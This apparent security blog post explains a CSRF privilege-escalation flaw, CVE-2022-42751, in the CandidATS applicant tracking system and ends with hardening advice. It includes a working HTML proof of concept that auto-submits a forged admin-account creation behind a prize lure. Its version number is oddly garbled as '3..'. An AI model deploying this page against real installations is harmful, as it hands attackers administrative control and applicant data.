CandidATS, an open-source Applicant Tracking System (ATS), is affected by a privilege-escalation vulnerability (CVE-2022-42751) in version 3... The root cause is missing Cross-Site Request Forgery (CSRF) protection on the user-creation request: an external attacker who lures a logged-in system administrator to a malicious page can make the administrator's browser create a new account with administrative privileges, which hands the attacker control of the application and access to the data it holds. This post covers why the vulnerability matters, how it is exploited, a proof-of-concept snippet, and links to the original references.

What is CSRF Vulnerability?

Cross-Site Request Forgery (CSRF) is a web vulnerability in which an attacker causes a victim's browser to send a request the victim never intended, riding on the victim's existing authenticated session. It works because browsers automatically attach a site's cookies to any request sent to that site, including requests triggered by a form or script on an unrelated page the victim happens to visit, typically reached through a malicious link or a compromised website. Unless the application demands something the attacker cannot obtain, such as an unguessable per-session token, the server cannot tell a forged request from a genuine one. The forged action is limited to what the victim is allowed to do, so when the victim is an administrator the impact is whatever an administrator can do: create users, change settings, or read sensitive data.

Exploit Details - CVE-2022-42751

CVE-2022-42751 affects the user-creation flow of CandidATS (v3..). The request that creates a user is not protected against CSRF, so an attacker who gets an authenticated administrator to load a page under the attacker's control can have the administrator's browser submit a crafted POST to that endpoint with an attacker-chosen username, password, e-mail address and role. The browser attaches the administrator's session cookie, and the application accepts the request as if the administrator had submitted the form.

Here is an HTML proof of concept (PoC) for the attack; CANDIDATS_URL stands for the target host:

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2022-42751 PoC</title>
</head>
<body>
  <!-- Cross-site POST to the user-creation endpoint. The victim's browser
       attaches their CandidATS session cookie to this request automatically. -->
  <form action="http://CANDIDATS_URL/user/create" method="POST">
    <input type="hidden" name="username" value="attacker" />
    <input type="hidden" name="password" value="attacker123" />
    <input type="hidden" name="email" value="attacker@example.com" />
    <input type="hidden" name="role" value="admin" />
    <!-- Visible button is only a fallback in case scripting is disabled -->
    <input type="submit" value="Click Here to Win a Prize!" />
  </form>

  <script>
    // Submit the first (and only) form as soon as the page loads; no click needed.
    document.forms[0].submit();
  </script>
</body>
</html>

In this PoC the script submits the form as soon as the page loads, so the administrator only has to open the page (for example via a link in an e-mail) and needs to click nothing; the visible button is a fallback if scripting is disabled. The browser sends the POST to /user/create with the administrator's CandidATS session cookie attached, and the application creates the 'attacker' account with administrative privileges. The endpoint path and field names in the PoC must match the target installation's actual user-creation form.

Original References & Resources

1. MITRE CVE Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42751
2. NIST NVD Detail: https://nvd.nist.gov/vuln/detail/CVE-2022-42751
3. CandidATS Official GitHub Repository: https://github.com/auielementblue/CandidATS

Conclusion

CVE-2022-42751 is a serious risk for CandidATS (v3..) deployments: a single visit to an attacker-controlled page by a logged-in administrator is enough to hand the attacker an administrative account, and with it the candidate and recruiting data the ATS holds. Administrators should upgrade to a release that adds CSRF protection to the user-creation flow as soon as one is available, and in the meantime audit the user list for accounts they did not create and avoid browsing untrusted sites from a browser session that is logged into CandidATS. Developers fixing this class of bug should require an unguessable per-session token on every state-changing request, validate it server-side with a constant-time comparison, mark the session cookie SameSite=Lax or Strict, and reject requests whose Origin or Referer header does not match the application's own origin.

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:12:00 UTC